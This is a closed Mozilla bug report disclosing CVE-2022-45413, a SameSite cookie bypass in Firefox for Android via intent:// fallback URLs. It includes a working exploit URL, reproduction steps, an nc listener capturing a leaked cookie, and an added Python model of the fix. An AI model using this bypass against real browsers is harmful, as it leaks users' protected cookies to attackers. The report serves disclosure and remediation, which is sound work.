Closed Bug 1791201 (CVE-2022-45413) Opened 2 years ago Closed 2 years ago

SameSite=Strict cookie bypass on Android via fallback URLs in intent:// scheme

Categories

(Fenix :: General, defect, P2)

Unspecified
Android

Tracking

(firefox105 wontfix, firefox106 wontfix, firefox107 fixed)

RESOLVED FIXED
Tracking Status
firefox105 --- wontfix
firefox106 --- wontfix
firefox107 --- fixed

People

(Reporter: haxatron1, Assigned: royang)

Details

(Keywords: csectype-other, reporter-external, sec-moderate, Whiteboard: [reporter-external] [client-bounty-form] [verif?] [geckoview:m107][adv-main107+])

Attachments

(2 files, 2 obsolete files)

Attached file cookie.php (obsolete) —

SameSite=Strict cookies can be sent cross-site (without user interaction) via the intent URLs. Consider the following URL:

intent://192.168.1.70#Intent;scheme=http;package=garbage;S.browser_fallback_url=http://192.168.1.70:8000/cookie;end

On Android, the S.browser_fallback_url parameter specifies the URL to load when the browser fails to verify the intent. As the intent above is invalid due to the invalid package name, the Firefox browser will not open another app but will instead open the URL http://192.168.1.70:8000/cookie.

When opening the fallback_url parameter, it doesn't take into account the passing of the SameSite=Strict cookie; as such, an attacker can just redirect a user to the URL intent://192.168.1.70#Intent;scheme=http;package=garbage;S.browser_fallback_url=http://192.168.1.70:8000/cookie;end and the cookies will get passed on.

STR:

  1. Download attached files.
  2. Host cookie.php on Site A, intent-redirect.php on Site B. Remember to change the URL in intent-redirect.php to Site B!
  3. Visit cookie.php on Site A to retrieve SameSite cookies
  4. Open a listener on Site A, then visit intent-redirect.php on Site B
  5. The SameSite cookie gets sent to cross-site from Site B to Site A.

└─$ nc -nvlp 8000
listening on [any] 8000 ...
connect to [192.168.1.70] from (UNKNOWN) [192.168.1.127] 43784
GET /cookie HTTP/1.1
Host: 192.168.1.70:8000
User-Agent: Mozilla/5.0 (Android 11; Mobile; rv:104.0) Gecko/104.0 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: a=b
Upgrade-Insecure-Requests: 1
Flags: sec-bounty?
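As an added example (not code from the bug report, from Fenix, or from Android Components), the Python below parses the intent: URL quoted above, pulls out S.browser_fallback_url, and models the cookie decision for the fallback load: loaded as a plain browser-initiated navigation it carries the Strict cookie, while the same load flagged as external is treated as cross-site and does not. The policy in cookies_for_navigation and the external_load flag are simplifications assumed for illustration, not Gecko's actual implementation; the cookie names and the second site are constructed sample data.

```python
"""Added example (not Mozilla's code): parse an Android intent: URI and model
how a SameSite policy treats the fallback URL the browser loads when no
installed app can handle the intent."""
from dataclasses import dataclass
from typing import Optional
from urllib.parse import unquote, urlsplit


@dataclass
class IntentUri:
    data: str                 # URI the intent targets, e.g. "http://192.168.1.70"
    package: Optional[str]    # package= field, if present
    extras: dict              # String extras (S.<name>=<value>)

    @property
    def fallback_url(self):
        # Convention used by Android browsers: S.browser_fallback_url is loaded
        # in the browser when the intent cannot be resolved to an app.
        return self.extras.get("browser_fallback_url")


def parse_intent_uri(uri: str) -> IntentUri:
    """Parse the intent://host/path#Intent;key=value;...;end syntax
    (the textual form accepted by android.content.Intent.parseUri)."""
    if not uri.startswith("intent:"):
        raise ValueError("not an intent: URI")
    body, sep, block = uri[len("intent:"):].partition("#Intent;")
    if not sep or not block.endswith(";end"):
        raise ValueError("missing '#Intent;...;end' block")
    fields, extras = {}, {}
    for item in block[: -len(";end")].split(";"):
        if not item:
            continue
        key, _, value = item.partition("=")
        value = unquote(value)        # values are URL-encoded in this syntax
        if key.startswith("S."):      # "S." marks a String extra
            extras[key[2:]] = value
        else:
            fields[key] = value
    scheme = fields.get("scheme")
    data = f"{scheme}:{body}" if scheme else body
    return IntentUri(data=data, package=fields.get("package"), extras=extras)


def site_of(url: str) -> str:
    """Scheme + host; the port does not count for cookie scoping."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.hostname}"


def cookies_for_navigation(cookies, initiator_site, target_url, external_load):
    """Simplified model (an assumption for this example, not Gecko's logic) of
    which cookies accompany a top-level GET navigation.

    cookies:        list of (name, samesite) with samesite in {"Strict", "Lax"}
    initiator_site: site that triggered the navigation, or None for a load the
                    browser itself starts (address bar, or a fallback URL loaded
                    without recording where it came from)
    external_load:  True when the load is flagged as coming from outside the
                    browser (another app, an intent); such loads are treated as
                    cross-site whatever the initiator
    """
    target_site = site_of(target_url)
    same_site = (not external_load) and (
        initiator_site is None or initiator_site == target_site)
    sent = []
    for name, samesite in cookies:
        if samesite == "Strict" and not same_site:
            continue                  # Strict: never on a cross-site request
        sent.append(name)             # Lax: allowed on top-level GET navigation
    return sent


# Constructed sample data: the URL from the report and two cookies for Site A.
REPORT_URL = ("intent://192.168.1.70#Intent;scheme=http;package=garbage;"
              "S.browser_fallback_url=http://192.168.1.70:8000/cookie;end")
SITE_A_COOKIES = [("a", "Strict"), ("session_lax", "Lax")]


def fallback_load(mark_external: bool):
    """Cookies attached when the browser loads the intent's fallback URL after
    failing to resolve the package. mark_external=False models the reported
    behaviour; True models the fix (flagging the load as external)."""
    intent = parse_intent_uri(REPORT_URL)
    return cookies_for_navigation(SITE_A_COOKIES, None,
                                  intent.fallback_url, mark_external)


if __name__ == "__main__":
    print("unflagged fallback load:", fallback_load(False))   # ['a', 'session_lax']
    print("external-flagged load:  ", fallback_load(True))    # ['session_lax']
```

The parser is the defender-side half of the check: anything that hands an intent's fallback URL to a WebView or browser engine should do so with the same provenance a link from another app would carry, which is what the external flag expresses in the model above.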
Attached file intent-redirect.php (obsolete) —
Group: firefox-core-security → mobile-core-security
Component: Security → Security: Android
Product: Firefox → Fenix
Attached file simpler-poc.html

Easier STR.
On Firefox Android,

  1. Download simpler-poc.html
  2. Set-cookie by clicking (1)
  3. Verify SameSite Strict cookie set by clicking (2), cookie should not be seen.
  4. SameSite Strict cookie should be sent on (3).
Attachment #9295084 - Attachment is obsolete: true
Attachment #9295085 - Attachment is obsolete: true

Actually, thinking about this now, it is a samesite=lax bypass too, as intent redirects are confirmed to work (so a user just needs to visit a malicious site to trigger the bypass)

Assignee: nobody → royang
Flags: needinfo?(royang)

Using the STR above, I can confirm that the cookie is sent cross-site. As Christian correctly pointed out, the loadUrl call in A-C should set the flag to external() to prevent this from happening. I've tested and it does indeed fix this issue.

Question for Irene, should there also be a check that catches this in GV? Thanks

Severity: -- → S2
Status: UNCONFIRMED → NEW
Ever confirmed: true
Priority: -- → P2
Whiteboard: [reporter-external] [client-bounty-form] [verif?] → [reporter-external] [client-bounty-form] [verif?] [geckoview:m107]

Roger, I looked at GV's code - we don't do anything about the cookies, flags or storage. All the related logic seems to be in Gecko. Seeing that this is related to Intents specifically, I would guess this is an AC issue.

Flags: needinfo?(bugzeeeeee)

Thanks, could this be marked as fixed (as the commit has been merged) or are there any secondary patches incoming?

Yes, this can be marked as fixed. I've confirmed on latest Nightly using simple-poc.html that this issue has been fixed. Thanks

Status: NEW → RESOLVED
Closed: 2 years ago
Resolution: --- → FIXED
Group: mobile-core-security → core-security-release
Flags: sec-bounty? → sec-bounty+
Component: Security: Android → General
OS: Unspecified → Android
Whiteboard: [reporter-external] [client-bounty-form] [verif?] [geckoview:m107] → [reporter-external] [client-bounty-form] [verif?] [geckoview:m107][adv-main107+]
Alias: CVE-2022-45413
Group: core-security-release
